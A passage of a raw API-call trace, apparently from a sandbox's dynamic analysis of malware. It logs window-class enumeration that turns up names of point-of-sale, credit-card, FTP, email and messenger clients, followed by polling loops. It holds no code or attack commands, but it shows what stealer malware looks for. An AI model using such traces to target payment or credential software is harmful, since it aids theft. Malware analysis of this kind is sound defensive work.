lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="scriptftp_win") returned 13 [0203.799] GetClassNameA (in: hWnd=0x10300, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="webdrivecls") returned 11 [0203.799] GetClassNameA (in: hWnd=0x102f6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="centralcreditcard") returned 17 [0203.799] GetClassNameA (in: hWnd=0x102f4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="omniposwnd") returned 10 [0203.799] GetClassNameA (in: hWnd=0x102f2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Societypositionmyselfapp") returned 24 [0203.799] GetClassNameA (in: hWnd=0x102f0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="outlookwindow") returned 13 [0203.799] GetClassNameA (in: hWnd=0x1031e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="yahoomessenger_cls") returned 18 [0203.799] GetClassNameA (in: hWnd=0x1031c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="trilliancls") returned 11 [0203.800] GetClassNameA (in: hWnd=0x102f8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="isspos_win") returned 10 [0203.800] GetClassNameA (in: hWnd=0x1031a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="whatsapp_cls") returned 12 [0203.800] GetClassNameA (in: hWnd=0x10318, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="spgagentserviceapp") returned 18 [0203.800] GetClassNameA (in: hWnd=0x10316, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="notepadclass") returned 12 [0203.800] GetClassNameA (in: hWnd=0x10314, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="afr38_cls") returned 9 [0203.800] GetClassNameA (in: hWnd=0x10312, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="edcsvrcls") returned 9 [0203.800] GetClassNameA (in: hWnd=0x10310, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="fpos_wnd") returned 8 [0203.800] GetClassNameA (in: hWnd=0x1030e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="creditservice_") returned 14 [0203.800] GetClassNameA (in: hWnd=0x1030c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ccv_servercls") returned 13 [0203.800] GetClassNameA (in: hWnd=0x1030a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="accuposwin") returned 10 [0203.800] GetClassNameA (in: hWnd=0x10308, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="aldelowin") returned 9 [0203.800] GetClassNameA (in: hWnd=0x10306, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="mxslipstreamapp") returned 15 [0203.800] GetClassNameA (in: hWnd=0x10304, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="utg2app") returned 7 [0203.800] GetClassNameA (in: hWnd=0x102fc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="thunderbirdwnd") returned 14 [0203.800] GetClassNameA (in: hWnd=0x102fa, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Heavy_") returned 6 [0203.800] GetClassNameA (in: hWnd=0x10302, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="spcwincls") returned 9 [0203.800] GetClassNameA (in: hWnd=0x102fe, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="May_Various_wnd") returned 15 [0203.800] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="operamail_win") returned 13 [0203.800] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ncftpwin") returned 8 [0203.801] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="leechftp_app") returned 12 [0203.801] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="fling_win") returned 9 [0203.801] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="icq_win") returned 7 [0203.801] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="gmailnotifierpro_wnd") returned 20 [0203.801] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="foxmailincmail_class") returned 20 [0203.801] GetClassNameA (in: hWnd=0x10298, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="flashfxp_") returned 9 [0203.801] GetClassNameA (in: hWnd=0x10282, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="farwindow") returned 9 [0203.801] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="filezilla_app") returned 13 [0203.801] GetClassNameA (in: hWnd=0x10278, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="bitkinex_cls") returned 12 [0203.801] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="coreftp_wnd") returned 11 [0203.801] GetClassNameA (in: hWnd=0x10266, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="absolutetelnet_") returned 15 [0203.801] GetClassNameA (in: hWnd=0x10264, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="alftpwindow") returned 11 [0203.801] GetClassNameA (in: hWnd=0x10268, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="barcaapp") returned 8 [0203.801] GetClassNameA (in: hWnd=0x10258, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="3dftp") returned 5 [0203.801] GetClassNameA (in: hWnd=0x10250, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="agree_Interesting_receive_window") returned 32 [0203.801] GetClassNameA (in: hWnd=0x10248, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="program_Him_cell_wnd") returned 20 [0203.801] GetClassNameA (in: hWnd=0x10240, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Gardenpoliticalclass") returned 20 [0203.801] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="long_Sense_class") returned 16 [0203.801] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Memberheavyclass") returned 16 [0203.802] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="movementIndeedbestcls") returned 21 [0203.802] GetClassNameA (in: hWnd=0x10230, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="executiveAnythingwnd") returned 20 [0203.802] GetClassNameA (in: hWnd=0x10226, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Condition_cls") returned 13 [0203.802] GetClassNameA (in: hWnd=0x10228, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="abilitywhereOperation") returned 21 [0203.802] GetClassNameA (in: hWnd=0x1021e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="director_glass_possible_win") returned 27 [0203.802] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Acceptclass") returned 11 [0203.802] GetClassNameA (in: hWnd=0x10214, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Something_victim_window") returned 23 [0203.802] GetClassNameA (in: hWnd=0x10200, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="instead_Recent_win") returned 18 [0203.803] GetClassNameA (in: hWnd=0x201f0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Whole_class") returned 11 [0203.803] GetClassNameA (in: hWnd=0x10206, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="youngeveryMomentwindow") returned 22 [0203.803] GetClassNameA (in: hWnd=0x10204, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="SideEndDeathcls") returned 15 [0203.803] GetClassNameA (in: hWnd=0x201e6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="nation_choose_app") returned 17 [0203.803] GetClassNameA (in: hWnd=0x40148, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="partner_app") returned 11 [0203.803] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="FactBelieveWorkerwin") returned 20 [0203.803] GetClassNameA (in: hWnd=0x501d2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="onLawyerseekwnd") returned 15 [0203.803] GetClassNameA (in: hWnd=0x201b4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.803] GetClassNameA (in: hWnd=0x30036, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.803] GetClassNameA (in: hWnd=0x30072, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.804] GetClassNameA (in: hWnd=0x501de, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0203.804] GetClassNameA (in: hWnd=0x20208, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.804] GetClassNameA (in: hWnd=0x302ca, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.804] GetClassNameA (in: hWnd=0x3011c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0203.804] GetClassNameA (in: hWnd=0x20084, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0203.804] GetClassNameA (in: hWnd=0x20122, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0203.804] GetClassNameA (in: hWnd=0x301e2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.804] GetClassNameA (in: hWnd=0x201fa, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.804] GetClassNameA (in: hWnd=0x101be, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0203.804] GetClassNameA (in: hWnd=0x101b8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.804] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0203.804] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.804] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0203.804] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0203.804] GetClassNameA (in: hWnd=0x10110, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.804] GetClassNameA (in: hWnd=0x10118, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="TabletModeCoverWindow") returned 21 [0203.804] GetClassNameA (in: hWnd=0x20152, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.805] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.805] GetClassNameA (in: hWnd=0x10116, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0203.805] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0203.805] GetClassNameA (in: hWnd=0x100f4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.805] GetClassNameA (in: hWnd=0x100f0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0203.805] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0203.805] GetClassNameA (in: hWnd=0x100ea, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0203.805] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.937] GetClassNameA (in: hWnd=0x100e4, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.937] GetClassNameA (in: hWnd=0x200da, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.937] GetClassNameA (in: hWnd=0x100c0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0203.937] GetClassNameA (in: hWnd=0x502e2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.937] GetClassNameA (in: hWnd=0x20040, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0203.937] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0203.937] GetClassNameA (in: hWnd=0x20030, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0203.937] GetClassNameA (in: hWnd=0x2002e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0203.937] GetClassNameA (in: hWnd=0x40038, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.937] GetClassNameA (in: hWnd=0x101cc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.937] GetClassNameA (in: hWnd=0x101c8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0203.937] GetClassNameA (in: hWnd=0x100ac, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0203.937] GetClassNameA (in: hWnd=0x10078, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0203.937] GetClassNameA (in: hWnd=0x10074, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0203.937] GetClassNameA (in: hWnd=0x10022, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0203.937] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0203.937] GetClassNameA (in: hWnd=0x502ae, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0203.937] GetClassNameA (in: hWnd=0x100d0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0203.938] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x10160, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x10150, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x10178, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x100ce, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0203.938] GetClassNameA (in: hWnd=0x10082, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x602b6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x601f8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0203.938] GetClassNameA (in: hWnd=0x601fc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x302e0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x60380, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x202ba, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x10372, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x10370, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.938] GetClassNameA (in: hWnd=0x1036e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x501ce, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x1036c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x1036a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x1035c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x1035a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10358, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10356, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10354, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10352, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10350, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x1034e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x1034c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x1034a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10348, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10346, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10344, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10342, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x10340, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.939] GetClassNameA (in: hWnd=0x1033e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x1033c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x1033a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10338, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10336, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10334, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10332, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10330, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x1032e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x1032c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x1032a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10328, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10326, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10324, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10322, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.940] GetClassNameA (in: hWnd=0x10320, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x102ee, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x10290, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x10274, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x10272, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x10260, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x10252, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.941] GetClassNameA (in: hWnd=0x10246, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x10244, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x10238, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x10236, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x10232, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x10220, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x10216, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x10210, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x1020c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x201d8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x201e0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x3018c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x30194, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x101c0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x10190, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.942] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0203.943] GetClassNameA (in: hWnd=0x100f2, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.943] GetClassNameA (in: hWnd=0x100e8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.943] GetClassNameA (in: hWnd=0x100dc, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.943] GetClassNameA (in: hWnd=0xc01d6, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.943] GetClassNameA (in: hWnd=0x2003c, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.943] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.943] GetClassNameA (in: hWnd=0x10076, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="IME") returned 3 [0203.943] Sleep (dwMilliseconds=0x64) [0204.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.059] GetClassNameA (in: hWnd=0x100e0, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="Worker Window") returned 13 [0204.059] GetClassNameA (in: hWnd=0x10128, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0204.059] GetClassNameA (in: hWnd=0x100f8, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="ForegroundStaging") returned 17 [0204.059] GetClassNameA (in: hWnd=0x10106, lpClassName=0x10aefd50, nMaxCount=260 | out: lpClassName="EdgeUiInputWndClass") returned 19 [0204.061] Sleep (dwMilliseconds=0x64) [0204.114] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.115] Sleep (dwMilliseconds=0x64) [0204.177] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.178] Sleep (dwMilliseconds=0x64) [0204.267] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.269] Sleep (dwMilliseconds=0x64) [0204.340] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.341] Sleep (dwMilliseconds=0x64) [0204.392] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.393] Sleep (dwMilliseconds=0x64) [0204.474] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.475] Sleep (dwMilliseconds=0x64) [0204.549] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.550] Sleep (dwMilliseconds=0x64) [0204.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.602] Sleep (dwMilliseconds=0x64) [0204.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.663] Sleep (dwMilliseconds=0x64) [0204.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.735] Sleep (dwMilliseconds=0x64) [0204.820] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.821] Sleep (dwMilliseconds=0x64) [0204.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.868] Sleep (dwMilliseconds=0x64) [0204.939] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0204.939] Sleep (dwMilliseconds=0x64) [0205.085] EnumWindows 